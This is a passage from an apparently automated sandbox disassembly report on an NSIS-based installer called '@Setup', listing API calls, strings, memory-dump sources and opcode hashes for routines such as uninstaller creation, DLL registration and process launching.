                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                    Strings
                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                    Strings
                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426976,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426976,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                    Strings
                                                                                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                    • API String ID: 2014279497-3433828417
                                                                                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                    • String ID: f
                                                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                    APIs
                                                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                    • MulDiv.KERNEL32(00010600,00000064,046024F2), ref: 00403295
                                                                                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                    Strings
                                                                                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Char$Next$Prev
                                                                                                                                                    • String ID: *?|<>/":
                                                                                                                                                    • API String ID: 589700163-165019052
                                                                                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                    • GlobalFree.KERNEL32(00781108), ref: 00402387
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1666415009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1666402963.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666431157.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666443393.00000000004CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1666578580.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_@Setup.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeGloballstrcpyn
                                                                                                                                                    • String ID: Exch: stack < %d elements$Pop: stack empty$RaFill
                                                                                                                                                    • API String ID: 1459762280-1579788240
                                                                                                                                                    • Opcode ID: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                    • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                                                                                                                                    • Opcode Fuzzy Hash: 334a6854756448942e11e43db00050e487f190ffbc5b65df06ae652413222f0a
                                                                                                                                                    • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                    Memory Dump Source
